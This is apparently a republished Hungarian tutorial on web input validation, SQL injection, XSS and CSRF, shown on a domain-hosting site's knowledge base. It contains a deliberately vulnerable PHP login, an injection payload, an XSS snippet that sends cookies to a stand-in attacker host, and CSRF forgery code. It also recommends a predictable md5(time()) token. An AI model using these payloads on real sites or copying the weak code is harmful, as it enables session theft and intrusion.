- Kezdőlap
-
Domain Regisztráció
-
Domain Regisztráció
ÚJ Domain regisztráció.
Csak add meg a választott domain neveket.Ha még szabad, az adataid megadásával azonnal BIZTONSÁGBA helyeztük neked. -
Domain Ellenőrzés
Egy gombnyomással akár 100 domain név foglaltságát is ellenőrizheted. Szabad domaineket pedig megveheted.
-
Ingyen Domain
Minden amit tudni szeretnél az ingyen domain nevekről. Megmutatjuk a teljes igazságot szépítés nélkül.
-
Domain + Honlap Gyorsan
Vevőmágnes, díjnyertes honlap, hogy ne legyél kiszolgáltatva egy fejlesztőnek se. Előre kalkulálható befektetés.
-
Domain Regisztráció
-
Tárhelyek
-
Google Barát Tárhelyek
Tárhely rendelés: Imádni fogod a sok látogatót, mert Tárhelyeink egyedi virtual szerverek és ezt szereti a Google.
-
Honlapszerkesztő tárhelyhez
5 perc alatt lesz honlapod & kockázat nélkül...mobilbarát, gyors és gyönyörű
-
Több honlap egy tárhelyen
Spórolj a minőségi szolgáltatással. Vásárolj osztott tárhelyet, így akár több honlapot is futtathatsz, egyedi domain nevekkel.
-
Tárhely kiegészítők
Egészítsd ki meglévő tárhelyedet:VIP, Google speed, E-mail cím, Tárhely bővítés, Adatbázis.
-
Domain Tárhely egyben
Domain tárhely rendelés kényelmesen. Online, papírok és postázás nélkül megrendelhetsz mindent a honlapod induláshoz. Kattints
-
Google Barát Tárhelyek
-
Szoftveres Segítség
-
Hogyan használd a szoftvereket?
Videó bemutató a domain kereső szoftverek használatához. Érdemes megnézned, mert egy jó domain név akár havi 500 új látogatót is hozhat neked.
-
Domain, amire keresnek!
Találj olyan szavakat, amire valódi emberek keresnek. Alkoss belőlük domain nevet és dőlni fognak a vevők! pl.: hasznaltauto.hu, domainflotta.hu
-
Foglalt a domain? Segítünk!
Foglalt a kigondolt domain? Próbáld ki szoftverünk és alkoss belőle összetett szót. Pl.: virag.hu helyett ViragBolt.hu
-
Értékes Domain - Google kulcsszó alapján
Írd be a számodra legfontosabb kulcsszót (amire az emberek keresnek a Google -ban) és a mesterséges intelligencia javasol neked ÉRTÉKES domain neveket
-
LISTA értékes domainekről
Ezek mind olyan domainek, amik értékesebbek a legtöbb domain névnél. Csak megveszed, ráirányítod a honlapodra és máris megszerezted az erejüket.
-
Domain Figyelő
Unod, hogy minden jó domain név foglat? Pedig van rá megoldás, ezért fogod imádni ezt a szolgáltatást!
-
Hogyan használd a szoftvereket?
- Domain LABOR
-
Domain elkapás - Felszabaduló domainek
Ha szeretnél értékes domain neveket, amivel jobbak az esélyeid? Felszabadul egy domain név, amit szeretnél megszerezni? Imádni fogod ezt a szolgáltatást.
-
DOMAIN névből 450e Ft?
Hogyan keress egy domain névvel 450.000 Ft -ot? Megmutatom. Leírtam mindent lépésről-lépésre, hogy Te is utánam csinálhasd. Kattints.
-
Szakértői Blog
Érdekes és hasznos írások, amik nagyszerű ötleteket és megvalósítható tanácsokat adnak. Ha izgat a domain és a web téma, akkor olvass bele.
-
PartnerProgram
Egy valóban működő partnerkapcsolat. Amiben mi is 3.000 új ügyfelet hozhatunk neked, ha van vállalkozásod.
-
Domain elkapás - Felszabaduló domainek
Témakörök:
Találj meg minket a Google+-on
Bementi adatok ellenőrzése
Beérkező adatok megbizhatósága
Alkalmazásunkhoz a böngésző felől GET vagy POST metódussal küldött, illetve sütikben tárolt adatok érkezhetnek, de ezenkívül még számtalan adatforrás elképzelhető. Ezek mindegyikét teljesen megbízhatatlannak kell tartanunk, és mielőtt felhasználnák őket, teljes körű ellenőrzésnek kell alávetni őket. Fontos annak a felismerése, hogy bármilyen kliens oldali ellenőrzés a biztonság szemszögéből tekintve teljesen lényegtelen, inkább csak kényelmi funkciónak tekinthető.1.) Tegyük fel, hogy alkalmazunk kliens oldali ellenőrzést, de:
- a felhasználó bármikor letilthatja böngészőjében a JavaScript kódok futtatását, így űrlapunk ellenőrzés nélkül kerül elküldésre.
- elküldhet egy módosított űrlapot is a szerverünknek. Persze ilyenkor a
HTTP_REFERER
környezeti változó értéke üres lesz, de igazából ennek meglétére amúgy sem szabad alapozni, mert könnyen akadhat olyan kliens, amely ezt a fejlécet nem, vagy nem igaz adattal tölti ki.
- ezenkívül a gonosz támadó a böngésző teljes megkerülésével,
akár egy sima Telnet program segítségével is kezdeményezhet
kommunikációt, és küldhet tetszőleges adatokat programunknak, ráadásul
megfelelő HTTP fejlécek (pl.
USER_AGENT
) megadásával azt is elhitetheti, hogy az adatok egy böngészőből érkeznek.
3.) A felhasználó gépén tárolt sütik tartalma is bármikor módosítható akár egy egyszerű szövegszerkesztő segítségével, így ezek tartalma sem megbízható, csak olyan adatokat tároljunk ilyen formában, melyek illetéktelen megváltoztatása nem okoz gondot. Van a sütiknek egy speciális fajtája, amely csak az adott böngésző példány futásának időtartama alatt él, az úgynevezett munkamenet süti ("session cookie"). Ezek tartalma elvileg nem egy fájlban kerül tárolásra, hanem a böngésző által használt memória területen, de ez erősen függhet az adott böngésző implementációjától, illetve egy kellően felkészült támadó ezt is képes lehet módosítani. Ráadásul, mint már az előbb említettem, mivel ez is a kliens felől érkezik, bármikor tetszés szerint hamisítható.
Beérkező adatok ellenőrzése.
Mint láttuk ez alapvető fontosságú, és mivel jóformán minden programunk állandóan ismétlődő része, ezért célszerű ezt általánosan megírni, esetleges használati tapasztalatok alapján folyamatosan csiszolni, így elég hamar egy jól használható eszközhöz jutunk. Egy lehetséges megoldás például a következő lehet:
- <?php
- // Definiáljuk, hogy a programunk milyen input adatokat vár
- $values = array(
- 'filters' => array(
- 'trim'
- ),
- 'values' => array(
- 'topicID' => array(
- 'rules' => array(
- 'required',
- 'integer',
- ’between’ => array(0, 10000)
- )
- ),
- 'loginName' => array(
- 'rules' => array(
- 'required',
- 'maxLength' => 10,
- 'regExp' => '/[A-Z][a-z]+/'
- )
- ),
- 'email' => array(
- 'rules' => array(
- 'required',
- 'email'
- )
- ),
- 'message' => array(
- 'default' => ’Semmi okos se jut az eszembe, szép napot mindenkinek!’
- 'filters' => array(
- 'stripHTML'
- )
- )
- )
- );
- // Input adatok feldolgozása
- if ( true === ($errors = validateInput()) {
- // A $topicID, $name, $email, $message változók megfelelő tartalommal
- // a rendelkezésünkre állnak, nyugodtan használhatjuk őket
- } else {
- // hibakezelés
- }
- ?>
’filters’
tömbeleme tartalmazhat olyan szűrőket, melyek minden adat esetén
meghívásra kerülnek, például hasznos lehet minden bejövő adat esetén a
felesleges szóköz karakterek levágása. A ’values’
tömbelem azt tartalmazza, hogy milyen adatokat vár programunk. Itt
megadjuk a változók nevét, illetve különböző szabályokat és szűrőket
rendelhetünk hozzájuk. Például megadhatjuk, hogy az adott paraméterre
feltétlenül szükségünk van, hogy egy formailag tökéletes e-mail cím
legyen, vagy például egész szám 0 és 10 000 között, de akár
mintaillesztő kifejezésnek való megfelelést is előírhatunk, stb. Itt
jegyezném meg, hogy a webes környezetben fejlesztők számára a
mintaillesztő kifejezések használata egy rendkívül hasznos eszköz,
mindenféleképpen ajánlom legalább alapszintű megismerését. Ezenkívül az
egyes adatokhoz külön szűrőket rendelhetünk. Esetleg megteremthetjük annak lehetőségét, hogy megadhassuk, hogy az adott paramétert milyen forrásból (GET/POST/süti) várjuk, de ennek igazából értelmét nem látom. Attól nem lesz biztonságosabb az alkalmazásunk, mert egy adott paramétert (amit egy űrlap elküldésével várunk) nem fogadunk el URL-n keresztül átadva, hisz az űrlap maga is hamisítható, az a fontos, hogy a felhasználó által küldött adatokat megfelelően ellenőrizzük, a felhasználó ne tudja alkalmazásunk állapotát (adatbázis, stb.) számára nem megengedett módon változtatni.
A fentebb vázolt lehetőség elsőre feleslegesnek, túlzottan bonyolultnak tűnhet, de nem így van. Egyrészt tapasztalatból mondhatom, amikor már másodjára kell az embernek azzal vesződnie, hogy egy oldal számára küldött adatokat ellenőrizze, egyből érezni kezdi, hogy itt valami általános megoldásra van szükség, ami leveszi ezen állandóan ismétlődő programrészek megírásának terhét, és egy magasabb absztrakciós szintre emeli ezt a folyamatot. Egy ilyen jellegű megközelítéssel elérhetjük, hogy programunk érdemi részére koncentrálhassunk. És ha például ezt a tömböt egy külső fájlba helyezzük, akkor kódunk is lényegesen egyszerűbbé, átláthatóbbá válik.
Másrészt, ha jobban megnézzük, a szűrők segítségével sok hasznos funkciót építhetünk be rendszerünkbe. Például egy fórumhozzászólás esetén az üzenetben nem szeretnénk ha szerepelnének HTML elemek, ezért használjuk a
stripHTML
szűrőt, amely eltávolítja az adott változóból a HTML elemeket, így a
feldolgozás során már ezzel nekünk nem kell törődnünk. A szabályokhoz
hasonlóan a szűrőknek is átadhatunk paramétereket, melyek befolyásolják
az adott szűrő viselkedését, például a stripHTML
szűrőnek megadhatjuk, hogy mely HTML elemeket hagyja mégis a szövegben.
Az ’idegen’ adat
Az ellenőrzés szükségessége triviálisnak tűnik GET/POST/süti forrásból bejövő adatok esetén, de ugyanúgy bizalmatlanok kell legyünk bármilyen külső forrásból származó adat esetén, melyekkel rendszerünk kapcsolatban áll, feldolgoz, megjelenít. Veszélyes lehet akár egy web szolgáltatás által visszaadott XML dokumentum, vagy akár egy e-mail is, aminek tartalmát például webmail rendszerünkben megjelenítjük. És most következzen a már említett három támadási lehetőség.
SQL injection
Ennek a módszernek a lényege, hogy megfelelően formázott bemeneti adatokkal próbálja a támadó (a gonosz :) ) elérni, hogy programunk módosított SQL lekérdezéseket hajtson végre. Lássuk a következő kódrészletet:
- <?php
- if (isset($_POST['userName']) && isset($_POST['password'])) {
- mysql_connect("localhost", "user", "pass");
- mysql_select_db("myDb");
- $query = "SELECT
- count(*) FROM users
- WHERE
- userName='{$_POST['userName']}'
- AND
- password='{$_POST['password']}'
- ";
- $result = mysql_query($query) or die('Muysql hiba: '.mysql_error());
- if (mysql_num_rows($result) > 0) {
- // sikeres bejelentkezés
- echo ’Isten hozott!’;
- } else {
- // hibás felhasználónév vagy jelszó
- echo ’Sicc innen!’;
- }
- } else {
- echo '
- <form name="login" method="post">
- Felhasználónév: <input type="text" name="userName" />
- Jelszó: <input type="text" name="password" />
- <input type="submit" value="Bejelentkezés" />
- </form>
- ';
- }
- ?>
- SELECT count(*) FROM users
- WHERE userName = 'Pistike' AND password = 'anyu'
- SELECT count(*) FROM users
- WHERE userName = 'Pistike' AND password = 'barmi' OR 1 = '1'
Ezen támadási mód alkalmas lehet adatbázis szerkezetünk felderítésére is, illetve annak ismeretében akár a teljes adatbázis, vagy egyes tábláinak törlésére. A módszer lényege, hogy a támadó úgy módosítja a beírtakat, hogy egyéb lekérdezéseket fűz a mi lekérdezésünk végére, és a kapott hibaüzenetek tartalmazzák számára a szükséges információkat. Ha például sikerül megtudnia egy tábla nevét, akkor akár egy
DROP táblanév;
utasítást is fűzhet a mi lekérdezésünk végére.Az SQL injection támadások elleni védekezés elemei:
- bejövő adatok védelme ("escape-elése"). Ha egy
mezőbe olyan karaktereket (általában az aposztróf, idézőjel, utasítás
határoló jel, megjegyzés jel) szeretnék beszúrni, aminek az adott
adatbázis kezelő rendszer esetén speciális jelentése van, akkor ezen
karakterek elé egy speciális karaktert (többnyire \) kell tenni, mely
jelzi, hogy az őt követő karakter nem bír speciális jelentéssel (ez
különbözhet adatbázis motortól függően). Mivel ezen támadási mód
lényege, hogy a támadó speciális karaktereket helyez el az bemenetben,
ezért az szöveg megvédésével az esetlegesen ártó szándékú tartalmat
hatástalanítjuk. Szövegek esetén amúgy is szükséges a megvédés, hiszen
a szövegben normál esetben is szerepelhetnek speciális karakterek
(gondoljunk csak az O'Reilly névre, vagy a becenevekre, melyeket
idézőjelekkel szokás írni).
- érdemes ahol csak módunkban áll a várt adatok hosszát
limitálni, ahol csak lehet dolgozzuk fel a bejövő adatot, ha csak egy
szót várunk, akkor dobjuk el az első szóhatároló utáni részt, ha számot
várunk, akkor alakítsuk át számmá, ha bármilyen formai elvárásunk van
vele kapcsolatban, akkor ellenőrizzük mintaillesztő kifejezésekkel,
vagy egyéb módon. Ez a plusz költség a biztonság oldalán megtérül majd.
- a program által használt adatbázis felhasználó jogait
korlátozzuk le amennyire csak lehet, érdemes lehat az oldal
adminisztrációs felületéhez külön felhasználót használni, amely
rendelkezik ezen felület plusz funkcionalitása által igényelt plusz
adatbázis jogokkal.
XSS – Cross Site Scripting
Az XSS támadások alapja az, hogy a támadó megpróbálja ártó szándékú script (főként JavaScript) bejuttatását oldalunkba. Mint már korábban említettem fontos, hogy minden, talán korántsem triviális külső adatforrást megbízhatatlannak minősítsünk. Bármi, amit egy weboldalon megjelenítünk, tartalmazhat ártalmas kódokat. Csak hogy egy alap képet kapjunk, vegyünk például egy webes levelező rendszert. A rosszindulatú felhasználó küldhet egy ilyen tárgyú levelet:
- You win 1000$!!!<script>alert('Oh No!');</script>
- <script>document.location = 'http://azenaranytojasttojoreklamoldalam.hu';</script>
- <script>
- document.location =
- 'http://gonosz.tamado.hu/cookielopo.php?cookies=' + document.cookie;
- </script>
Az XSS támadások elleni védekezés alapja szintén a bejövő adatok megfelelő szűrése. Mint láthatjuk, ismét előkerült a szűrés fogalma, érdemes pár szót ejteni arról, hogy ennek felépítése során hogyan érdemes eljárni. A legalapvetőbb szempont, hogy inkább eleinte legyünk szigorúbbak. Például nevek esetén első lépésben csak betűket engedünk meg. Jön egy György-Pál nevű ember, akkor ezen a szabályon enyhítünk egy kicsit és a megengedett karakterek közé felvesszük a – jelet is. Így egy kis idő múlva kellően tökéletessé válik rendszerünk. Az eltúlzott szabályokat a felhasználók egyből jelezni fogják, míg a túlságosan lazákról esetlegesen csak túl későn értesülünk.
CSRF - Cross-Site Request Forgeries
Az előbb ismertetett támadás a látogató weboldal iránti bizalmán alapszik, és így egy támadó által veszélyes tartalommal ellátott weboldalra érkezve úgymond áldozattá válhat. A most bemutatandó technika viszont pont ennek ellenkezője, a weboldal felhasználó iránti bizalmára épül. A CSRF támadás alapja egy meghamisított HTTP kérés, ezért először nézzük meg, hogy hogyan is néz ki egy normál kérés. Mondjuk beírjuk a böngészőnkbe, hogy domainflotta
.hu
. Erre a böngészőnk küld egy kérést a megfelelő webszervernek, ami a következőképpen néz ki:
GET / HTTP/1.1
Host: domainflotta.hu
HTTP/1.1 200 OK
Content-Length: 69
<html>
<img src="http://domainflotta.hu/szep_uj_logonk.jpg" />
</html>
GET /szep_uj_logonk.jpg HTTP/1.1
Host: domainflotta.hu
- <html>
- <form action="/uzenet.php">
- Tárgy: <input type="text" name="subject"
- <br>Szöveg: <textarea name="message"></textarea>
- <br><input type="submit" value="Elküldés">
- </form>
- </html>
GET /uzenet.php?subject=hat&message=nemistudom HTTP/1.1
Host: uzenofal.hu
Cookie: PHPSESSID=123456789
img
elem. Ha például szeretnénk egy üzenetet küldeni a fenti oldalra egy
felhasználó nevében, akkor elegendő őt rávenni, hogy nézzen meg egy
oldalt, ami tartalmazza a következő HTML kódot:- <img src="http://uzenofal.hu/uzenet.php?subject=Elvis%20a%20kiraly&message=..." />
uzenet.php
script
belépettnek fogja tekinteni a felhasználót és rögzíti az üzenetét. És
minderről a felhasználó semmit sem fog tudni, noha a történteknek,
akaratlanul ugyan, de cinkos társa.Ezzel a módszerrel még egy jól megírt munkamenet kezeléssel, felhasználó ellenőrzéssel rendelkező rendszer is kijátszható, ráadásul még akkor is sikeres tud lenni egy ilyen támadás, ha a rendszer elérhetősége korlátozva van. Hiszen a támadást maga az adott funkció elérésére jogosult felhasználó „hajtja végre”.
Nézzük, hogy hogyan is védekezhetünk a CSRF támadások ellen. Először is kézenfekvő megoldás lehet, hogy az űrlapok küldésekor POST metódust használjunk, de ez korántsem elegendő, hiszen egy POST kérés is viszonylag könnyen hamisítható. Elegendő, ha a támadónak sikerül a felhasználót rávennie, hogy kattintson egy képre, linkre, ami mögött egy űrlap elküldése áll, ami egy rejtett űrlap elemben tárolja az POST-olni kívánt adatokat, de még erre sincs feltétlenül szükség, például a következő JavaScript kód dinamikusan állít elő és küld el egy űrlapot:
- <script>
- var myInput;
- var form = document.createElement("form");
- form.method = 'post';
- form.action = 'http://uzenofal.hu/uzenet.php';
- var input = document.createElement("input");
- input.type = 'hidden';
- document.body.appendChild( form );
- form.method = "post";
- myInput = input.cloneNode();
- form.appendChild( myInput );
- myInput.name = "subject";
- myInput.value = "hat";
- myInput = input.cloneNode();
- form.appendChild( myInput );
- myInput.name = "message";
- myInput.value = "EljenRakosi";
- form.submit();
- </script>
target
je például egy rejtett
frame. Valamint az újabb böngészőkben már létezik egy XMLHTTP nevű
objektum, amin keresztül kommunikációt folytathatunk észrevétlenül a
szerverrel.A megfelelő védelem részeként érdemes lehet komolyabb súlyú akciók esetén egy az adott akció jóváhagyását kérő lépcsőfok beiktatása, ami POST metódus esetén rendkívül megnehezíti egy sikeres CSRF támadás lehetőségét.
Ezenkívül az is komoly biztonságot nyújthat az ilyen jellegű támadásokkal szemben, ha valamilyen módon azonosítani tudjuk űrlapunkat. Tehát minden alkalommal, amikor egy űrlapot generálunk a felhasználó számára, akkor elrejtünk benne egy azonosítót, amit szerver oldalon is eltárolunk mondjuk a felhasználó munkamenetébe (felülírva az előző ehhez az űrlaphoz tartozó azonosítót), majd amikor egy űrlapot küldenek nekünk, akkor megnézzük, hogy érkezett-e ilyen azonosító. Ha nem, akkor egyből kiderül, hogy valami nem stimmel, ha igen, akkor ellenőrizzük annak valódiságát, és csak ha ebben megbizonyosodtunk, hajtjuk végre a kívánt akciót.
Azonosító elrejtése az űrlapba:
- <?php
- $token = md5( time() );
- $_SESSION['token'] = $token;
- echo '
- <html>
- <form action="/uzenet.php">
- <input type="hidden" name="token" value="' . $token . '"
- Tárgy: <input type="text" name="subject"
- <br>Szöveg: <textarea name="message"></textarea>
- <br><input type="submit" value="Elküldés">
- </form>
- </html>
- ';
- ?>
Támadás levelezőn keresztül
Egy dolgot még kipróbáltam kíváncsiságból. Az érdekelt volna, hogy amikor egy levelező program megjelenít egy HTML levelet, és a levél tartalmaz külsőleg linkelt képet, akkor webszervernek küldött kérésbe beleteszi-e az adott kép domainjéhez az adott gépen beállított sütiket. A következő egyszerű kis programot használtam:
Levelező program ellenőrző:
- <?php
- if (!isset($_COOKIE['felho'])) {
- setcookie('felho', 1, time()+3600);
- } else {
- $cookie = $_COOKIE['felho'];
- $cookie++;
- setcookie('felho', $cookie, time()+3600);
- }
- $FILE = fopen(time().'.txt', 'w');
- fputs($FILE, print_r($_GET, true));
- fputs($FILE, print_r($_COOKIE, true));
- fclose($FILE);
- ?>
- <html>
- <body>
- <img src="http://felho.hu/x.php?x=bela">
- <a href="http://felho.hu/reklam.html">klikk ide</a>
- <!-- a reklam.html-ben is van egy a fentivel megegyező img tag -->
- </body>
- </html>
- // a kép lekéresekor generált file
- Array
- (
- [x] => bela
- )
- Array
- (
- )
- // a linkre való kattintás nyomán generált file
- Array
- (
- [x] => bela
- )
- Array
- (
- // az értékből következik, hogy a cookie megelőzően már létezett
- [felho] => 10
- )
A fenti programot Outlook Express-szel (az IE-t
használja HTML levelek megjelenítésére), illetve Mozillával (a levelező
a böngészőbe van integrálva) próbáltam ki, mindkét esetben a remélt,
megnyugtató működést tapasztaltam: egy levélen keresztül történő
támadás csak akkor lehet sikeres, ha a felhasználót sikerül rávenni
arra, hogy egy a levélben található linkre rákattintson. Ez azonban nem
biztos, hogy így van egy webes levelezőprogramnál, fontos ismernünk
tehát ezt a kockázati lehetőséget egy ilyen, vagy számunkra ismeretlen
levelezőprogram használatakor. Rengeteg ember levelező programja sajnos
úgy van beállítva, hogy a HTML tartalmat egyből megmutassa, de azért
már jóval kisebb számú az a botor felhasználó, aki egy linkre rákattint.
Remélem ezúttal is sikerült pár hasznos dologra felhívni a figyelmet,
legközelebb a kliens és a szerver közötti, az oldal látszólagos,
illetve tényleges újratöltődése nélküli kommunikáció lehetséges
megoldásait fogom áttekinteni.
Az eredeti cikk megtalálható a weblabor.hu oldalán.
Ha találtál valami hasznosat a cikkben, nyomj egy tetszik gombot:
Kérlek írj egy köszönömöt, ha tetszett!
Mi ez, hova kerültem?
A domainflotta.hu honlap tudásbázisát nézed éppen. Rengeteg leírást és szoftveres segítséget adunk, amivel megnövelheted a forgalmad. Vagy épp megvalósíthatod az ötleted.- Mobil barát honlap - 5 perc alatt - hagyd abba a halogatást. Vágj bele
- Tárhely, ami Google barát - előny egy kiélezett versenyben
- Domain regisztráció - biztonságban, értékes ötletekhez
Ezeket már olvastad?
Ehhez elõször kicsit vissza kell ugranunk az idõben 2005-be, amikor is a&nbs...
Megnézte: 66989 ember
Ez az információ már elavult. A Google megszüntette a Gmail összek&ou...
Megnézte: 34166 ember
E-mail fejlécek megjelenítése - felhasználói segédlet - Tartalomjegyzék E-mail fejl...
Megnézte: 34112 ember
A leggyakoribb eset Az új domain szabályzat szerint 4 munkanap alatt elbírálják a doma...
Megnézte: 31457 ember
Ez a "hibaüzenetet" a böngészõd írja ki, amikor megpróbálsz belépni a webes leve...
Megnézte: 29627 ember
Sokan nem tudják, pedig létfontosságú:A Google bünteti a duplikált tartalmakat. Így a...
Megnézte: 25427 ember
A rendelés díjának befizetésérõl:A rendelésed rögzítésekor küldünk e-mailben egy prof...
Megnézte: 25390 ember
Böngészõ segítségével Hogyan? A következõ webcímre látogass el e...
Megnézte: 24609 ember
Domain nevet csak ip címre vagy dns címekre lehet irányítani. Az ip cím formátuma: 127.0.0....
Megnézte: 24608 ember
Mire jó?Nagyon sok olyan eset van, amikor be kell illeszteni egy html kódot az oldalba. Ez...
Megnézte: 21264 ember